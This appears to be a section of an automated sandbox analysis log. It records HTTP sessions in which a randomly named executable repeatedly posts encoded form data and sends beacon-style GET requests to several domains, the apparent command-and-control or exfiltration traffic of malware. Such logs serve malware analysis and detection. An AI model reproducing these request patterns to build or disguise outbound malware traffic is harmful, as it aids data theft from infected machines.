              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:20.122401953 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:20 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvouXfpGVf%2FAPyScpXF1FVa%2F8%2BP1Q93%2B7napzLthYxsP2cYS%2BPUI3757UPgKDmaXAw5RV%2FdgjSduHNI5WMTtHfjse6e%2BoJDUocmdGWBQXaKUsfgZX3d6PZPFvwDqY0%2FEftO0r%2FC7k8s%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f195faa19a1-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              35 | 192.168.2.6 | 49764 | 188.114.96.3 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:22.038928986 CEST | 1843 | OUT | POST /4jz5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.1win-moldovia.fun
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.1win-moldovia.fun
              Referer: http://www.1win-moldovia.fun/4jz5/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:22.713160038 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:22 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BWmiFkkzBgAT%2FaSovLL9gC72YXX0XVhHcddRNV655VuUm%2FTFsVSbo8HCw6AtafwWDHxz2r3nm0E8XKRpOkZ6J8V049Ko%2BZYQd%2FzrUfpap01B3KGwas3GGFNgxHke%2FvMF0ol80c5Cmo%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f294d8a18fa-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              36 | 192.168.2.6 | 49765 | 188.114.96.3 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:24.586982965 CEST | 535 | OUT | GET /4jz5/?yXghy=KTox&FR=r5SoQQ/DZBXKP6QrNwGfWrJNBN6t0nUZU0GWsfQ0/kE9qy9dgr2+a8OrPCjBDi0TM6SD7wE/mt75vEwxSaGxWB73VkpxOVd4no3A+iHSW7NgpDpMEtZ9JlGQE1ss8/xFDzn1hco= HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.1win-moldovia.fun
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:25.218151093 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:07:25 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KbTlssbaJYxbcs9Tn0Iz6Wk5E9w0Vai3MHVa6WtctGFDFBoVVoboC4kPLx45IsNOl9kU4T4g2Zu95mXZyJ69iD7%2B0eAeio4S4i87fZVHg6RtZ1pn5yX%2Fe7oknV1hOvb1NwOJ%2F3dN0A%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bec9f391b305e86-EWR
              alt-svc: h3=":443"; ma=86400
              Data Ascii: 3fb9<?phpheader('HTTP/1.1 404 Not Found');?><!DOCTYPE html><html lang="ro-MD"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>1Win | Accesai site-ul oficial al platformei de jocuri 1WINbet</title> <link rel="preconnect" href="https://fonts.googleapis.com/"> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""> <link href="./css/css2" rel="stylesheet"> <link href="./css/style.css" rel="stylesheet" type="text/css"> <link rel="icon" href="./img/favicon.png" type="
              Sep 6, 2024 09:07:25.218178034 CEST | 1236 | IN
              Data Ascii: image/png"> <link rel="shortcut icon" href="favicon.png" type="image/png"> <meta name="description" content="Mirror funcional i actualizat al 1WIN pentru accesul la site-ul oficial i nregistrare."> </head> <body>
              Sep 6, 2024 09:07:25.218189955 CEST | 448 | IN
              Data Ascii: -14.1,24-27.6l12.3-67.9c2.9-15.5,5.3-23,10.6-28.7c8.1-9.2,24.4-13.4,35.7-4.2c6.7,5.6,9.2,15.2,7.4,28.7l-12.3,73.5c-2.7,16.3,4.2,26.2,17.7,26.2h30.4c17.3,0,20.8-13.4,23.3-27.6l17.8-92.1C822.7,202.9,811,170.1,771.7,164.4z" class="SvgLogo_st2_Thl
              Sep 6, 2024 09:07:25.218200922 CEST | 1236 | IN
              Data Ascii: -30.7c-14.8,0-20.2-11-17.3-25.5L532.2,188c2.5-15.2,9.2-24.4,28-24.4h23.3c19.8,0,24.7,9.6,20.5,30L579,328z" class="SvgLogo_st4_WmLRg"></path> <path d="M241.2,163.6c7.8,9.2,17,20.5,12.3,48.1l-12,64.8l2.1,52c0.4,18.
              Sep 6, 2024 09:07:25.218210936 CEST | 1236 | IN
              Data Ascii: .php">Sporturi de Fantezie</a></li> <li class="hide_2"><a href="./tvbet.php">TVBET</a></li> <li class="hide_3"><a href="./aviator.php">Aviator</a></li> <li cla
              Sep 6, 2024 09:07:25.218221903 CEST | 1236 | IN
              Data Ascii: nregistrare </a> </div> </div> </header> <div class="wrap"> <div class="box text b10"> <h1 class="center">Despre
              Sep 6, 2024 09:07:25.218234062 CEST | 1236 | IN
              Data Ascii: <div class="flx jcc b30"><a href="./go.php" class="btn fon-orang shadow-dark h60 radius16">Accesai 1win</a></div> <div class="info-box info-box-warning"> <div class="info-box-content">
              Sep 6, 2024 09:07:25.218358994 CEST | 1236 | IN
              Data Ascii: pot mndri cu un astfel de document, confirmnd fiabilitatea i transparena serviciilor lor, oferind acces la:</p> <ul> <li>maini de sloturi i aparate de jocuri pe orice tem</li>
              Sep 6, 2024 09:07:25.218372107 CEST | 1236 | IN
              Data Ascii: <div class="info-box info-box-success"> <div class="info-box-content"> <p>n unele jocuri, putei juca n modul demo complet gratuit, fr autorizare, crearea profilului i rencrca
              Sep 6, 2024 09:07:25.218384027 CEST | 1236 | IN
              Data Ascii: al 1WIN. Acest lucru este deosebit de relevant n cazurile n care site-ul oficial se confrunt cu blocaje din partea motoarelor de cutare, autoritilor de aplicare a legii sau probleme tehnice. Chiar i platformele de divertisment
              Sep 6, 2024 09:07:25.223184109 CEST | 1236 | IN
              Data Ascii: s uitai de jocuri pentru o perioad de timp sau s v luai rmas bun de la progresul sau banii dvs. Mirror-ul funcional al 1win de astzi v va ajuta.</p> </div> </div>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              37 | 192.168.2.6 | 49766 | 3.33.130.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:30.361263990 CEST | 812 | OUT | POST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=Ms+FdaqNW6nXe5JkNjQtJBE/zhj3m1d4FMGBCAgQPiatnKa9MFro2syhjwNrxb699z7zPhjnxlMn3p+ZU8c2RydUrM79+WV0+tenQHhohR1etmToCCY1JqLdJS2UfbM0p6UlSbqxZOzayYUGAdpk+G8VWvLV9GNR7uruBJQ3iOnL1uYR/r1qq6NQptkSyRQq+iz+CHHkwOiN


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              38 | 192.168.2.6 | 49767 | 3.33.130.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:32.903429031 CEST | 836 | OUT | POST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=Ms+FdaqNW6nXeZZkOEstZRE+4Bj38FcxFMKBCFRLPQ+tnoS9NB3o1syh7gNq877Q9yHdPjnnxlIn3r2ZUrI1Ridsis7jx2V0+tenQDJChR9etTboChA2WaLeIS2UOrMwp6V2Sa3mZKDaydoGAMpnw29eZPK52VQ83tCYKpBQ8dfK94ZLjY1J4qtSpv8gyxQA8iL+QQLD/6Hu/KcxR+cjB5pdqvFninaWFA==


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              39 | 192.168.2.6 | 49768 | 3.33.130.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:35.448297977 CEST | 1849 | OUT | POST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              40 | 192.168.2.6 | 49769 | 3.33.130.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:37.989592075 CEST | 537 | OUT | GET /j05r/?FR=BuWlesfdBtPnA5IHERdoQmZu3QbBl1BpYdqEJlZZDkGznKOwHVqz9ciJpAUT/J3S93ftOAqXjjElrJOBApQXUwRpks3avQJqxp6cbB0vhTJHmzWOGAIsV62ofQDOeP44q5hyDP4=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.thewhitediamond.org
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:39.405561924 CEST | 405 | IN | HTTP/1.1 200 OK
              Server: openresty
              Date: Fri, 06 Sep 2024 07:07:39 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FR=BuWlesfdBtPnA5IHERdoQmZu3QbBl1BpYdqEJlZZDkGznKOwHVqz9ciJpAUT/J3S93ftOAqXjjElrJOBApQXUwRpks3avQJqxp6cbB0vhTJHmzWOGAIsV62ofQDOeP44q5hyDP4=&yXghy=KTox"}</script></head></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              41 | 192.168.2.6 | 49770 | 5.144.130.52 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:44.522728920 CEST | 797 | OUT | POST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=iEjdtIsdrbJTNrJwFkw4C094VkDouQXUekpLgt9Hwnx+/k6tGOxTjGiwbwm9w5bMZrOM2icjqeRSL5O2mF5aR2bXcfGi1OuH6cyWsLlCeZcBGww9x01q/yBh7zr+uYmL2G3fWQwuZi7/nISuyxeUz5DU2nB03i+fJp++3kTXXQl7gE5IppK9OcbZtyvQIvKf31THdMSMn4Y7


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              42 | 192.168.2.6 | 49771 | 5.144.130.52 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:47.075408936 CEST | 821 | OUT | POST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=iEjdtIsdrbJTCvNwADs4EU9/ZEDonwXYeklLgvRXlEF+/BetFPxTvmiwVQn1/ZbLZryi2jgjqetSL5+2nyUMQmbvFPGaxOuH6cyWsLgfeZEBGAs9wRJr2SBi8zr+/Imx2G2KWURDZhD/nKau1j2V95DerXBg6ACRBouz/WPaOyJDly4S1aKecM7btw3iIPK111rHPberoM9YuWknA5qysKm28P4V8xvVlQ==


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              43 | 192.168.2.6 | 49772 | 5.144.130.52 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:49.625061035 CEST | 1834 | OUT | POST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              44 | 192.168.2.6 | 49773 | 5.144.130.52 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:07:52.159965992 CEST | 532 | OUT | GET /539x/?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.aflaksokna.com
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:01.970495939 CEST | 1172 | IN | HTTP/1.1 302 Found
              Connection: close
              content-type: text/html
              content-length: 771
              date: Fri, 06 Sep 2024 07:08:01 GMT
              cache-control: no-cache, no-store, must-revalidate, max-age=0
              location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              45 | 192.168.2.6 | 49774 | 162.241.226.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:07.047419071 CEST | 809 | OUT | POST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=RuN6R/58wiq/xjD+p04ZPZQoX53oAn/V71/0Rr0XcMrlHcm4FDgt/sMBBEBRPSei3yJm6Xbj7hb9+ad3uzYZ3Jw/o8O5t3WtTV6cPKRNTVJ0WTBv3E6I+n5iiRmcuPaCnbcM8Vj3W0lrQDxr0mS+AYLzZCmN9OMWefXuu+l4OLNsH1Jjn7S0omAN7kEZm7XmNZ2WV0cL7Y8S
              Sep 6, 2024 09:08:07.624213934 CEST | 479 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:07 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              46 | 192.168.2.6 | 49775 | 162.241.226.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:09.599709034 CEST | 833 | OUT | POST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=RuN6R/58wiq/wDz+6jsZK5QrYZ3oJH/R70D0RqBQce/lE4q4XSgtyMMBJkBQLSe53yNA6WXj7g/9+YV3uAwW2Zwx9sO7jXWtTV6cPO5nTTh0Wjxv2l6J9n5jlRmcqPaGnbc68UPdWwVrQGNr33S5ZIK4UimY9udPRZOvq4lEd8AGGDI57ISX62gP7mcrmbXMPZOWHjQs0sZxavnxV1progcprrdB5G3eRw==
              Sep 6, 2024 09:08:10.174850941 CEST | 479 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:10 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              47 | 192.168.2.6 | 49776 | 162.241.226.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:12.153824091 CEST | 1846 | OUT | POST /d029/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.easyanalytics.site
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.easyanalytics.site
              Referer: http://www.easyanalytics.site/d029/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:12.768970966 CEST | 479 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:12 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              48 | 192.168.2.6 | 49777 | 162.241.226.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:14.695676088 CEST | 536 | OUT | GET /d029/?FR=cslaSIgu4SK5hEDj9hUVBt4DVeSxODrxiV3UUYpYDpvuIfyXRHc3+9hbGUkpPVL7vSNSmH7KmnD+rq4wgj4O7IkekeXb2lWER124D4kOUSFtT1194nz+plZg+E7GwvWNw7cZgDY=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.easyanalytics.site
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:15.289027929 CEST | 479 | IN | HTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:08:15 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              49 | 192.168.2.6 | 49778 | 217.160.0.193 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:20.369648933 CEST | 785 | OUT | POST /bb55/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=nfb0GOOUJQD8SK2XtFMV92hT4lTwLDO4xpWtTa7K+WK4WRuXMKyENQrj4HLujfOql+TOBBO+y17uV+BdMTmwTre7S6OffKammE5mvs5k7oTQ9T2LnJQFzMnjN3zFuEy5fwvd/iNu/aS9hp3iUtD08LJnOk4qsX0q7QD4j6M1w38HniEcrb9EqP5fyBYplamz1fU068zp9MNL
              Sep 6, 2024 09:08:21.131532907 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:20 GMT
              Server: Apache
